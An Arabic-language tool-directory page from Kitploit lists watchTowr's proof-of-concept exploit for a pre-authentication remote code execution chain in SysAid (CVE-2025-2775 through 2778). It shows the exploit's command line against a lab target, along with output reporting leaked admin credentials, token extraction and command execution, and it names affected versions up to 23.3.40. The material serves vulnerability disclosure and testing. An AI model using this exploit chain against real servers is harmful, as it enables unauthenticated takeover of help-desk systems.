Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
watchTowr-vs-SysAid-PreAuth-RCE-Chain — PoC لسلسلة RCE قبل المصادقة في SysAid (CVE-2025-2775, CVE-2025-2776, CVE-2025-2777, CVE-2025-2778) | Kitploit
أدوات/GitHubGitHub/watchtowrlabs/watchtowr-vs-sysaid-preauth-rce-chain
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubwatchtowrlabs/watchtowr-vs-sysaid-preauth-rce-chain

watchTowr-vs-SysAid-PreAuth-RCE-Chain

PoC لسلسلة RCE قبل المصادقة في SysAid (CVE-2025-2775, CVE-2025-2776, CVE-2025-2777, CVE-2025-2778)

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
1263منذ سنة واحدةلم تتم المراجعة بعد
مشاركة

SysAid PreAuth RCE Chain PoC

إثبات المفهوم لسلسلة RCE بدون مصادقة في SysAid (CVE-2025-2775, CVE-2025-2776, CVE-2025-2777, CVE-2025-2778)

انظر منشور مدونتنا للتفاصيل الفنية

https://github.com/user-attachments/assets/03245fab-915d-43b6-8e91-f0a18251af49

PoC أثناء التنفيذ

root@kitploit:~

python watchTowr-vs-SysAid-PreAuth-RCE-Chain.py -t http://192.168.201.217:8080/ -l 192.168.201.1 -c "whoami"

                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        watchTowr-vs-SysAid-PreAuth-RCE-Chain.py

        (*) SysAid Pre-Auth RCE Chain

          - Sina Kheirkhah (@SinSinology) and Jake Knott of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2025-2775, CVE-2025-2776, CVE-2025-2777, CVE-2025-2778]

[+] Starting HTTP server on port 80
[*] Leaking creds...
[+] Leaked credentials: admin:Aa123456
[+] Successfully logged in
[+] Extracted token
[*] Poisoning with commands
[+] Commands executed successfully
[*] Done


الإصدارات المتأثرة

الإصدارات التالية معرضة لسلسلة RCE بدون مصادقة هذه: <= 23.3.40، يمكن العثور على ملاحظات إصدار البائع هنا

تابع مختبرات watchTowr

لأحدث الأبحاث الأمنية، تابع فريق مختبرات watchTowr

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
تنزيل الأداة